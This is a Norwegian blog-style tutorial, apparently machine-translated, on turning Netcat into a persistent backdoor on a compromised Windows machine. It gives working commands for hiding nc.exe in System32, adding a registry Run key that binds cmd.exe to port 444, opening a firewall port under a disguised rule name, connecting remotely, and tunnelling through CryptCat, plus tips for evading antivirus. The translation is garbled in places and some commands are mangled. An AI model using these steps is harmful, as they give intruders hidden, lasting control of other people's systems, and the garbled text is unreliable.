Kali Linux Netcat vedvarende agenter

Kali Linux Netcat vedvarende agenter
I denne artikkelen skal vi løpe gjennom ting du kan gjøre med et nettverksverktøy kalt Netcat, den sveitsiske hærkniven til nettverksverktøy.

Introduksjon:

Netcat er et nettverksverktøy som kan lese og skrive til både UDP- og TCP -porter. Det blir ofte referert til som den sveitsiske hærkniven for hackingverktøy fordi den kan gjøre flere ting som både en klient og en server under hackingeventyr. Vi vil ofte bruke den til å lage bind og omvendte skjellhetter rundt rapporter for å se hva som skjer og sende filer mellom maskiner. Shell er en måte du kan samhandle med en datamaskin som en ledetekst på Windows eller Terminal i Linux. Netcat lar oss utføre mange ting som omvendte hyller, for å kommunisere mellom to eller flere datamaskiner, og vil gjøre det mulig for deg å utføre en mengde funksjoner. Netcat er i stand til å portskanne og koble seg til åpne porter ved hjelp av dets enkle kommandoargumenter. Den er også i stand til å sende filer og gi ekstern administrasjon enten gjennom et direkte eller omvendt skall.

Ansetter Netcat som et vedvarende middel:

Netcat er et ekstremt allsidig og nyttig program. Jeg har nevnt tidligere i denne artikkelen at den brukes til å kommunisere mellom to datamaskiner. Det kan også brukes hvis du vil installere utholdenhet. Netcat kan brukes som bakdør. Så la oss begynne med å lage et vedvarende skall på det kompromitterte systemet ved å bruke Netcat. Vi vil bruke -NC.exe, som det er kjørbar navn. Men hvis du gir nytt navn før du bruker det, minimerer sjansene for deteksjon. Selv etter å ha gitt nytt navn til en antivirusprogramvare kan det imidlertid oppdage den. Mange hackere endrer noen av elementene i Netcats kildekode, som er unødvendige og før du bruker den, kompilerer den. Disse endringene vil gjøre Netcat usynlig for antivirusprogramvare.

På Kali lagres Netcat i/usr/share/windows-binaries. For å laste det opp til det kompromitterte systemet, bruk kommandoen innen meterpreter:

$ meterpreter> Opplasting/usr/share/windows-binaries/nc.EXE C: \\ Windows \\ System32

Det er mange filetyper i denne mappen, for å skjule en fil i et kompromittert system er det det beste stedet

Du kan også bruke en triviell filoverføringsprotokoll hvis du ikke har en meterpreter -tilkobling for å overføre filen.

Neste trinn er å konfigurere registeret slik at du kan starte netcat når systemet starter opp og sørge for at det lytter på port 444. Bruk kommandoen gitt nedenfor:

$ meterpreter> reg setval -k hklm \\ programvare \\ microsoft \\ windows \\
CurrentVersion \\ Run -Vv NC -D 'C: \\ Windows \\ System32 \\ NC.EXE -LDP 444
-E CMD.exe '

Nå som du har brukt kommandoen som er nevnt ovenfor, bruk følgende QueryVal -kommando for å sikre at vellykket implementering av endring i registeret.

$ meterpreter> reg queryval -khklm \\ programvare \\ microsoft \\ windows \\
Currentverion \\ Run -Vv NC

Åpne en port på en lokal brannmur for å bekrefte at det kompromitterte systemet vil godta eksterne tilkoblinger til Netcat ved å bruke $ Netsh -kommandoen. Å kjenne målets operativsystem har førsteklasses betydning. Kommandolinjekonteksten som brukes til Windows Vista, Windows Server 2008, er

$ Netsh Advfirewall

For tidligere systemer brukes $ Netsh Firewall -kommandoen. Skriv inn skallkommandoen på Meterpreter -ledeteksten for å legge porten til den lokale Windows -brannmuren, skriv inn regelen ved hjelp av passende kommando. For riktig funksjon av systemet, brukernavn som 'svchostpassthrough' mens du navngir regelen. En prøvekommando vises som følger:

$ C: \ Windows \ System32> Netsh Firewall Legg til portåpning
TCP 444 "Service Pass-Through"

For å bekrefte endringen ble vellykket implementert ved hjelp av følgende kommando:

$ C: \ Windows \ System32> Netsh Firewall Show Port Opening

Etter bekreftelsen av portregelen, må du sørge for at alternativet omstart fungerer.

Skriv inn følgende kommando fra Meterpreter -ledeteksten:

$ meterpreter> Start på nytt

Skriv inn følgende kommando fra et interaktivt Windows Shell:

$ C: \ Windows \ System32> Shutdown -R -T 00

For å få tilgang til kompromittert system eksternt, skriv inn $ NC ved en ledetekst, angi ordens verbositet (-V og -Vv rapporterer grunnleggende informasjon, mye mer informasjon), og skriv deretter inn IP -adressen til målet og portnummeret.

$ NC -V 192.168.43.128 444

Dessverre har Netcat noen begrensninger, som det ikke er noen autentisering av data overført, og antivirusprogramvare kan oppdage det. Problemet med mindre kryptering kan imidlertid løses ved å bruke CryptCat, som er et alternativ til NetCat. Under overføring mellom den utnyttede verten og angriperen sikrer den data ved å bruke TwoFish -kryptering. Det vil ikke være galt å si at det gir rimelig sterk beskyttelse for krypterte data.

Forsikre deg om at det er en lytter klar og konfigurert med et sterkt passord for å bruke CryptCat, bruk følgende kommando:

$ sudo cryptcat -k passord -l -p 444

Neste trinn er å laste opp CryptCat til det kompromitterte systemet og konfigurere det til å koble til lytterens IP -adresse ved å bruke følgende kommando:

$ C: \ CryptCat -K -passord 444

Det er uheldig å si at Netcat og dens varianter kan oppdages ved antivirusprogramvare. Ved å bruke en HEX -redigerer for å endre kildekoden til Netcat, er det en mulighet for at Netcat vil bli uoppdaget. Men det er en lang prøve-og-feilprosess. En mer pålitelig tilnærming er å bruke Metasploit Frameworks utholdenhetsmekanismer.

Konklusjon:

Netcat er en sveitsisk hærkniv som brukes til effektiv hacking. Det kan utføre flere funksjoner for å få tilgang til serveren og klienten. Denne artikkelen gir deg en kort beskrivelse av sfunksjonen og bruken av Netcat. Jeg håper du likte det hvis denne artikkelen har hjulpet deg, så dele den med vennene dine. Spør gjerne om spørsmål du har om Netcat. Du kan også dele din mening og ytterligere detaljer.